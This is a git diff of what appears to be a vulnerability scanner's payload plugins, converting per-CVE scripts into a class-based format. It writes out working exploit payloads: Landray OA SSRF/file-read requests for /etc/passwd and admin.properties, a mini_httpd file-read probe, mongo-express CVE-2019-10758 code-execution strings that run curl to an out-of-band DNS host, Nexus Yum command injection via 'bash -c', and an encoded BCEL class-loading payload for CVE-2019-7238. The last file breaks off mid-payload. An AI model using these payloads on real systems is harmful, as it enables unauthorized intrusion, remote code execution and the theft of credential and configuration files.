-        'data': 'var={"body":{"file":"file://C:\Windows\System32\drivers\etc\hosts"}}'
-    },
-    {
-        'path': 'sys/ui/extend/varkind/custom.jsp',
-        'data': 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
-    },
-        {
-        'path': 'ui/extend/varkind/custom.jsp',
-        'data': 'var={"body":{"file":"file:///etc/passwd"}}'
-    },
-    {
-        'path': 'ui/extend/varkind/custom.jsp',
-        'data': 'var={"body":{"file":"file://C:/Windows/System32/drivers/etc/hosts"}}'
-    },
-    {
-        'path': 'ui/extend/varkind/custom.jsp',
-        'data': 'var={"body":{"file":"file://C:\Windows\System32\drivers\etc\hosts"}}'
-    },
-        {
-        'path': 'ui/extend/varkind/custom.jsp',
-        'data': 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
-    },
-        {
-        'path': 'extend/varkind/custom.jsp',
-        'data': 'var={"body":{"file":"file:///etc/passwd"}}'
-    },
-    {
-        'path': 'extend/varkind/custom.jsp',
-        'data': 'var={"body":{"file":"file://C:/Windows/System32/drivers/etc/hosts"}}'
-    },
-    {
-        'path': 'extend/varkind/custom.jsp',
-        'data': 'var={"body":{"file":"file://C:\Windows\System32\drivers\etc\hosts"}}'
-    },
-    {
-        'path': 'extend/varkind/custom.jsp',
-        'data': 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
-    },
-    {
-        'path': 'custom.jsp',
-        'data': 'var={"body":{"file":"file:///etc/passwd"}}'
-    },
-    {
-        'path': 'custom.jsp',
-        'data': 'var={"body":{"file":"file://C:/Windows/System32/drivers/etc/hosts"}}'
-    },
-    {
-        'path': 'custom.jsp',
-        'data': 'var={"body":{"file":"file://C:\Windows\System32\drivers\etc\hosts"}}'
-    },
-    {
-        'path': 'custom.jsp',
-        'data': 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
-    },
-]
-
-def cnvd_2021_28277_scan(clients):
-    ''' CNVD-2021-28277, 首次公开日期为2021-04-15, 蓝凌oa存在多个漏洞, 攻击者可利用该漏洞获取服务器控制权 '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': 'Landray-OA',
-        'vul_type': 'SSRF',
-        'vul_id': 'CNVD-2021-28277',
-    }
-
-    for payload in cnvd_2021_28277_payloads:
-        path = payload['path']
-        data = payload['data']
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)
-            or (('password' in res.text) and ('kmss.properties.encrypt.enabled = true' in res.text))
-        ):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res,
-                # 'Default SceretKey': 'kmssAdminKey'
-            }
-            return results
-    return None
diff --git a/payloads/Landray/landray-oa-cnvd-2021-28277-ssrf-fileread.py b/payloads/Landray/landray-oa-cnvd-2021-28277-ssrf-fileread.py
new file mode 100644
index 0000000..5aa860d
--- /dev/null
+++ b/payloads/Landray/landray-oa-cnvd-2021-28277-ssrf-fileread.py
@@ -0,0 +1,123 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+蓝凌OA custom.jsp任意文件读取(SSRF)
+    CNVD-2021-28277
+
+CNVD-2021-28277, 首次公开日期为2021-04-15
+    蓝凌oa存在多个漏洞, 攻击者可利用该漏洞获取服务器控制权
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'sys/ui/extend/varkind/custom.jsp',
+                'data': 'var={"body":{"file":"file:///etc/passwd"}}'
+            },
+            {
+                'path': 'sys/ui/extend/varkind/custom.jsp',
+                'data': 'var={"body":{"file":"file://C:/Windows/System32/drivers/etc/hosts"}}'
+            },
+            {
+                'path': 'sys/ui/extend/varkind/custom.jsp',
+                'data': 'var={"body":{"file":"file://C:\Windows\System32\drivers\etc\hosts"}}'
+            },
+            {
+                'path': 'sys/ui/extend/varkind/custom.jsp',
+                'data': 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
+            },
+                {
+                'path': 'ui/extend/varkind/custom.jsp',
+                'data': 'var={"body":{"file":"file:///etc/passwd"}}'
+            },
+            {
+                'path': 'ui/extend/varkind/custom.jsp',
+                'data': 'var={"body":{"file":"file://C:/Windows/System32/drivers/etc/hosts"}}'
+            },
+            {
+                'path': 'ui/extend/varkind/custom.jsp',
+                'data': 'var={"body":{"file":"file://C:\Windows\System32\drivers\etc\hosts"}}'
+            },
+                {
+                'path': 'ui/extend/varkind/custom.jsp',
+                'data': 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
+            },
+                {
+                'path': 'extend/varkind/custom.jsp',
+                'data': 'var={"body":{"file":"file:///etc/passwd"}}'
+            },
+            {
+                'path': 'extend/varkind/custom.jsp',
+                'data': 'var={"body":{"file":"file://C:/Windows/System32/drivers/etc/hosts"}}'
+            },
+            {
+                'path': 'extend/varkind/custom.jsp',
+                'data': 'var={"body":{"file":"file://C:\Windows\System32\drivers\etc\hosts"}}'
+            },
+            {
+                'path': 'extend/varkind/custom.jsp',
+                'data': 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
+            },
+            {
+                'path': 'custom.jsp',
+                'data': 'var={"body":{"file":"file:///etc/passwd"}}'
+            },
+            {
+                'path': 'custom.jsp',
+                'data': 'var={"body":{"file":"file://C:/Windows/System32/drivers/etc/hosts"}}'
+            },
+            {
+                'path': 'custom.jsp',
+                'data': 'var={"body":{"file":"file://C:\Windows\System32\drivers\etc\hosts"}}'
+            },
+            {
+                'path': 'custom.jsp',
+                'data': 'var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}'
+            },
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        
+        vul_info = {
+            'app_name': 'Landray-OA',
+            'vul_type': 'SSRF/FileRead',
+            'vul_id': 'CNVD-2021-28277',
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+            data = payload['data']
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)
+                or (('password' in res.text) and ('kmss.properties.encrypt.enabled = true' in res.text))
+            ):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res,
+                    # 'Default SceretKey': 'kmssAdminKey'
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Landray/main.py b/payloads/Landray/main.py
deleted file mode 100644
index 210ade0..0000000
--- a/payloads/Landray/main.py
+++ /dev/null
@@ -1,32 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-蓝凌是国内数字化办公专业服务商
-    蓝凌OA扫描类: 
-        蓝凌OA custom.jsp任意文件读取(SSRF)
-            CNVD-2021-28277
-
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.Landray.cnvd_2021_28277 import cnvd_2021_28277_scan
-
-class Landray():
-    def __init__(self):
-        self.app_name = 'Landray-OA'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cnvd_2021_28277_scan, clients=clients)
-        ]
-
-landray = Landray()
diff --git a/payloads/MiniHttpd/cve_2018_18778.py b/payloads/MiniHttpd/cve_2018_18778.py
deleted file mode 100644
index 3a474ff..0000000
--- a/payloads/MiniHttpd/cve_2018_18778.py
+++ /dev/null
@@ -1,43 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool import check
-
-cve_2018_18778_payloads = [
-    {'path': 'etc/passwd'}
-]
-
-def cve_2018_18778_scan(clients):
-    ''' 在mini_httpd开启虚拟主机模式的情况下, 用户请求http://HOST/FILE将会访问到当前目录下的HOST/FILE文件 '''
-    hackClient = clients.get('hackClient')
-    
-    vul_info = {
-        'app_name': 'MiniHttpd',
-        'vul_type': 'FileRead',
-        'vul_id': 'CVE-2018-18778',
-    }
-
-    headers = {
-        'Host': ''
-    }
-
-    for payload in cve_2018_18778_payloads:
-        path = payload['path']
-
-        res = hackClient.request(
-            'get',
-            path,
-            headers=headers,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        if (check.check_res_fileread(res.text)):
-            results = {
-                'Target': res.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/MiniHttpd/main.py b/payloads/MiniHttpd/main.py
deleted file mode 100644
index 6d79d4b..0000000
--- a/payloads/MiniHttpd/main.py
+++ /dev/null
@@ -1,32 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-Mini_httpd是一个微型的Http服务器(约为Apache的90%) 广泛被各类IOT(路由器, 交换器, 摄像头等) 作为嵌入式服务器
-    Mini_httpd扫描类: 
-        mini_httpd 任意文件读取
-            CVE-2018-18778
-                Payload: https://vulhub.org/#/environments/mini_httpd/CVE-2018-18778/
-
-file:///etc/passwd
-file:///C:/Windows/System32/drivers/etc/hosts
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.MiniHttpd.cve_2018_18778 import cve_2018_18778_scan
-
-class MiniHttpd():
-    def __init__(self):
-        self.app_name = 'MiniHttpd'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2018_18778_scan, clients=clients)
-        ]
-
-minihttpd = MiniHttpd()
diff --git a/payloads/MiniHttpd/minihttpd-cve-2018-18778-fileread.py b/payloads/MiniHttpd/minihttpd-cve-2018-18778-fileread.py
new file mode 100644
index 0000000..ac39565
--- /dev/null
+++ b/payloads/MiniHttpd/minihttpd-cve-2018-18778-fileread.py
@@ -0,0 +1,59 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+mini_httpd 任意文件读取
+    CVE-2018-18778
+        Payload: https://vulhub.org/#/environments/mini_httpd/CVE-2018-18778/
+
+在mini_httpd开启虚拟主机模式的情况下, 用户请求http://HOST/FILE将会访问到当前目录下的HOST/FILE文件
+'''
+
+from lib.tool import check
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {'path': 'etc/passwd'}
+        ]
+    
+    def POC(self, clients):
+        hackClient = clients.get('hackClient')
+        
+        vul_info = {
+            'app_name': 'MiniHttpd',
+            'vul_type': 'FileRead',
+            'vul_id': 'CVE-2018-18778',
+        }
+
+        headers = {
+            'Host': ''
+        }
+
+        for payload in self.payloads:
+            path = payload['path']
+
+            res = hackClient.request(
+                'get',
+                path,
+                headers=headers,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (check.check_res_fileread(res.text)):
+                results = {
+                    'Target': res.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/MongoExpress/cve_2019_10758.py b/payloads/MongoExpress/cve_2019_10758.py
deleted file mode 100644
index 1139edb..0000000
--- a/payloads/MongoExpress/cve_2019_10758.py
+++ /dev/null
@@ -1,81 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from time import sleep
-
-cve_2019_10758_payloads = [
-    {
-        'path': 'checkValid',
-        'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl DNSDOMAIN")',
-        'headers': {'Authorization': 'Basic YWRtaW46cGFzcw=='}
-        
-    },
-    {
-        'path': 'checkValid',
-        'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping -c 4 DNSDOMAIN")',
-        'headers': {'Authorization': 'Basic YWRtaW46cGFzcw=='}
-    },
-    {
-        'path': 'checkValid',
-        'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping DNSDOMAIN")',
-        'headers': {'Authorization': 'Basic YWRtaW46cGFzcw=='}
-    },
-    {
-        'path': 'checkValid',
-        'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl DNSDOMAIN")',
-        'headers': {}
-        
-    },
-    {
-        'path': 'checkValid',
-        'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping -c 4 DNSDOMAIN")',
-        'headers': {}
-    },
-    {
-        'path': 'checkValid',
-        'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping DNSDOMAIN")',
-        'headers': {}
-    }
-]
-
-def cve_2019_10758_scan(clients):
-    ''' 如果可以成功登录, 或者目标服务器没有修改默认的账号密码(admin:pass), 则可以执行任意node.js代码 '''
-    client = clients.get('reqClient')
-    sessid = '3d2f0881262d8bd19e65a6ce89229c5e'
-
-    vul_info = {
-        'app_name': 'mongo-express',
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2019-10758',
-    }
-
-    for payload in cve_2019_10758_payloads:
-        md = random_md5()                                       # * 随机md5值, 8位
-        dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
-
-        path = payload['path']
-        data = payload['data'].replace('DNSDOMAIN', dns_domain)
-        headers = payload['headers']
-
-        res = client.request(
-            'post',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res is None:
-            continue
-
-        sleep(3)
-        if (dns.result(md, sessid)):
-            results = {
-                'Target': res.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res
-            }
-            return results
-    return None
diff --git a/payloads/MongoExpress/main.py b/payloads/MongoExpress/main.py
deleted file mode 100644
index a0fc236..0000000
--- a/payloads/MongoExpress/main.py
+++ /dev/null
@@ -1,31 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-'''
-mongo-express是一款mongodb的第三方Web界面, 使用node和express开发
-    Mongo-Express扫描类: 
-        mongo-express 未授权远程代码执行
-            CVE-2019-10758
-                Payload: https://vulhub.org/#/environments/mongo-express/CVE-2019-10758/
-
-file:///etc/passwd
-file:///C:\Windows\System32\drivers\etc\hosts
-'''
-
-# from lib.initial.config import config
-from lib.tool.thread import thread
-from payloads.MongoExpress.cve_2019_10758 import cve_2019_10758_scan
-
-class MongoExpress():
-    def __init__(self):
-        self.app_name = 'mongo-express'
-
-    def addscan(self, clients, vuln=None):
-        if vuln:
-            return eval('thread(target={}_scan, clients=clients)'.format(vuln))
-
-        return [
-            thread(target=cve_2019_10758_scan, clients=clients)
-        ]
-
-mongoexpress = MongoExpress()
diff --git a/payloads/MongoExpress/mongoexpress-cve-2019-10758-rce.py b/payloads/MongoExpress/mongoexpress-cve-2019-10758-rce.py
new file mode 100644
index 0000000..96dc32d
--- /dev/null
+++ b/payloads/MongoExpress/mongoexpress-cve-2019-10758-rce.py
@@ -0,0 +1,95 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+mongo-express 未授权远程代码执行
+    CVE-2019-10758
+        Payload: https://vulhub.org/#/environments/mongo-express/CVE-2019-10758/
+
+如果可以成功登录, 或者目标服务器没有修改默认的账号密码(admin:pass), 则可以执行任意node.js代码
+'''
+
+from lib.api.dns import dns
+from lib.tool.md5 import random_md5
+from PluginManager import Vuln_Scan
+
+class Scan(Vuln_Scan):
+    def __init__(self):
+        self.payloads = [
+            {
+                'path': 'checkValid',
+                'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl DNSDOMAIN")',
+                'headers': {'Authorization': 'Basic YWRtaW46cGFzcw=='}
+                
+            },
+            {
+                'path': 'checkValid',
+                'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping -c 4 DNSDOMAIN")',
+                'headers': {'Authorization': 'Basic YWRtaW46cGFzcw=='}
+            },
+            {
+                'path': 'checkValid',
+                'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping DNSDOMAIN")',
+                'headers': {'Authorization': 'Basic YWRtaW46cGFzcw=='}
+            },
+            {
+                'path': 'checkValid',
+                'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl DNSDOMAIN")',
+                'headers': {}
+                
+            },
+            {
+                'path': 'checkValid',
+                'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping -c 4 DNSDOMAIN")',
+                'headers': {}
+            },
+            {
+                'path': 'checkValid',
+                'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping DNSDOMAIN")',
+                'headers': {}
+            }
+        ]
+    
+    def POC(self, clients):
+        client = clients.get('reqClient')
+        sessid = '3d2f0881262d8bd19e65a6ce89229c5e'
+
+        vul_info = {
+            'app_name': 'mongo-express',
+            'vul_type': 'RCE',
+            'vul_id': 'CVE-2019-10758',
+        }
+
+        for payload in self.payloads:
+            md = random_md5()                                       # * 随机md5值, 8位
+            dns_domain = md + '.' + dns.domain(sessid)              # * dnslog/ceye域名
+
+            path = payload['path']
+            data = payload['data'].replace('DNSDOMAIN', dns_domain)
+            headers = payload['headers']
+
+            res = client.request(
+                'post',
+                path,
+                data=data,
+                headers=headers,
+                allow_redirects=False,
+                vul_info=vul_info
+            )
+            if res is None:
+                continue
+
+            if (dns.result(md, sessid)):
+                results = {
+                    'Target': res.request.url,
+                    'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+                    'Request': res
+                }
+                return results
+        return None
+    
+    def EXP(self, clients):
+        pass
+
+    def Start(self, clients):
+        return self.POC(clients)
diff --git a/payloads/Nexus/cve_2019_15588.py b/payloads/Nexus/cve_2019_15588.py
deleted file mode 100644
index e361fd4..0000000
--- a/payloads/Nexus/cve_2019_15588.py
+++ /dev/null
@@ -1,69 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-
-cve_2019_15588_payloads = [
-    # * createrepoPath
-    {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"/bin/bash -c $@|bash 0 echo RCECOMMAND || /createrepo"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-    # * mergerepoPath
-    {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"/bin/bash -c $@|bash 0 echo RCECOMMAND || /mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-    # ! Windows的Payload暂不支持
-    # {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"C:/Windows/System32/notepad.exe || /createrepo"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-    # {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"C:\\\\Windows\\\\System32\\\\notepad.exe || /createrepo"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-    # {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"C:/Windows/System32/notepad.exe || /mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-    # {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"C:\\\\Windows\\\\System32\\\\notepad.exe || /mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-]
-
-def cve_2019_15588_scan(self, clients):
-    ''' CVE-2019-5475的绕过 '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2019-15588',
-    }
-
-    headers = {
-        'Content-Type': 'application/json',
-        'X-Requested-With': 'XMLHttpRequest',
-        'X-Nexus-UI': 'true',
-        'Referer': client.protocol_domain,
-        'Origin': client.protocol_domain,
-        'Accept': 'application/json,application/vnd.siesta-error-v1+json,application/vnd.siesta-validation-errors-v1+json',
-    }
-
-    # todo 尝试获取Yum: Configuration相应的id路径, 如果没有找到yum_id路径, 则退出当前POC
-    path = self.get_yumID(client, vul_info)
-    if not path:
-        return
-
-    for payload in cve_2019_15588_payloads:
-        random_str = random_md5(6)
-        RCEcommand = 'echo ' + random_str
-        
-        data = payload['data'].replace('RCECOMMAND', RCEcommand)
-
-        res2 = client.request(
-            'put',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res2 is None:
-            continue
-
-        if (check.check_res(res2.text, ' echo '+random_str)
-            # or (check.check_res(res2.text, '/'+random_str))
-        ):
-            results = {
-                'Target': res2.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res2
-            }
-            return results
-    return None
diff --git a/payloads/Nexus/cve_2019_5475.py b/payloads/Nexus/cve_2019_5475.py
deleted file mode 100644
index c7e8d75..0000000
--- a/payloads/Nexus/cve_2019_5475.py
+++ /dev/null
@@ -1,71 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.tool.md5 import random_md5
-from lib.tool import check
-
-cve_2019_5475_payloads = [
-    # * "key":"createrepoPath"
-    {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"bash -c $@|bash 0 echo echo RCEMD &"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-    {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"/bin/bash -c $@|bash 0 echo echo RCEMD &"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-    {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"cmd.exe /c echo/RCEMD &"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-    {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"C:/Windows/System32/cmd.exe /c echo/RCEMD &"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-    {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"C:\\\\Windows\\\\System32\\\\cmd.exe /c echo/RCEMD &"},{"key":"mergerepoPath","value":"mergerepo"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-    # * "key":"mergerepoPath"
-    {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"bash -c $@|bash 0 echo echo RCEMD &"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-    {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"/bin/bash -c $@|bash 0 echo echo RCEMD &"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-    {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"cmd.exe /c echo/RCEMD &"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-    {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"C:/Windows/System32/cmd.exe /c echo/RCEMD &"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-    {'data': '{"typeId":"yum","enabled":true,"properties":[{"key":"maxNumberParallelThreads","value":"10"},{"key":"createrepoPath","value":"createrepo"},{"key":"mergerepoPath","value":"C:\\\\Windows\\\\System32\\\\cmd.exe /c echo/RCEMD &"}],"id":"002f54bc25593c69","notes":"Automatically added on Thu Sep 01 13:08:15 UTC 2019"}'},
-]
-
-def cve_2019_5475_scan(self, clients):
-    ''' Nexus内置插件Yum Repository的RCE命令注入漏洞, 其最早被披露于Hackerone '''
-    client = clients.get('reqClient')
-    
-    vul_info = {
-        'app_name': self.app_name,
-        'vul_type': 'RCE',
-        'vul_id': 'CVE-2019-5475',
-    }
-
-    headers = {
-        'Content-Type': 'application/json',
-        'X-Requested-With': 'XMLHttpRequest',
-        'X-Nexus-UI': 'true',
-        'Referer': client.protocol_domain,
-        'Origin': client.protocol_domain,
-        'Accept': 'application/json,application/vnd.siesta-error-v1+json,application/vnd.siesta-validation-errors-v1+json',
-    }
-
-    # todo 尝试获取Yum: Configuration相应的id路径, 如果没有找到yum_id路径, 则退出当前POC
-    path = self.get_yumID(client, vul_info)
-    if not path:
-        return
-
-    for payload in cve_2019_5475_payloads:
-        random_str = random_md5(6)
-        
-        data = payload['data'].replace('RCEMD', random_str)
-
-        res2 = client.request(
-            'put',
-            path,
-            data=data,
-            headers=headers,
-            allow_redirects=False,
-            vul_info=vul_info
-        )
-        if res2 is None:
-            continue
-        
-        if ((check.check_res(res2.text, ' echo '+random_str))
-            or (check.check_res(res2.text, random_str))
-        ):
-            results = {
-                'Target': res2.request.url,
-                'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
-                'Request': res2
-            }
-            return results
-    return None
diff --git a/payloads/Nexus/cve_2019_7238.py b/payloads/Nexus/cve_2019_7238.py
deleted file mode 100644
index 99950c4..0000000
--- a/payloads/Nexus/cve_2019_7238.py
+++ /dev/null
@@ -1,87 +0,0 @@
-#!/usr/bin/env python3
-# -*- coding:utf-8 -*-
-
-from lib.api.dns import dns
-from lib.tool.md5 import random_md5
-from lib.tool import head
-from lib.tool import check
-from time import sleep
-
-random_str = random_md5(6)
-RCEcommand = 'echo ' + random_str
-
-cve_2019_7238_payloads = [
-    # * 回显POC
-    {
-        'path': 'service/extdirect',
-        'data': '''{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"' '.getClass().forName('com.sun.org.apache.bcel.internal.util.ClassLoader').newInstance().loadClass('$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$eb$7f$UW$Z$7eN$b2$d9$99L$s$9bd6$9bd$A$xH$80M$80$5dJ$81$96$e5bC$K$e5$S$u$924$YR$ad$93eH$W6$3b$db$d9$d9$Q$d0j$d1Z$ea$adVQ$yj$d1R5$de5$a2$h$q$82h$V$b5$9f$fc$ea7$3f$f6$_$e0$83$3f$7f$8d$cf$99$dd$N$d9d$5b$fc$R$ce$ceyo$e7y$df$f3$3e$ef$cc$db$ef$de$bc$N$60$L$fe$a1$n$IGAVC$N$9cz$$$cfI$89$ab$m$a7$e2i$Nm$f04$e41$n$97$b3$w$s$a5$e4$9c$8a$f3$K$86U$7cR$c5$a74t$e0y$v$fd$b4$8a$cfhX$81$XT$5cP$f0Y$v$fa$9c$82$X5$7c$k$_$a9$b8$a8$e2e$F_P$f1E$V_R$f1e$F_Q$f1$8a$8a$afjx$V_$93$cb$d7$V$5cR$f0$N$N$df$c4e$Nk$f1$z$Nk$f0$9a$82$x$g$ba$e1$c8$cd$b7$e5$d3wT$7cW$fe$be$aea$r$ae$ca$e5$7b$K$be$af$e0$N$81$a07$e6$da$d6I$B$a3$ef$b45a$c5$d3Vf4$3e$e0$cbvP$bb3$95Iy$bb$Fj$a3$5d$83$C$81$5e$e7$a4$z$d0$d4$97$ca$d8G$f2$e3$p$b6$3b$60$8d$a4m$e9$ec$q$ad$f4$a0$e5$a6$e4$be$q$Mxc$a9$9c$40C$9f$3d$91J$c7$e5$c2$88$ea$ced$ba$U3$b4$df$f3$b2$bdN$sc$t$bd$94$93$RhY$A$a17m$e5r$b4o$Y$93Fc$W$ad$d2$95$m$9f$g9MGi$b2$7f$a1$89$e2$da$cf$e5$ed$9cG$f0cL$c2v$x$bd$fa$3d7$95$Z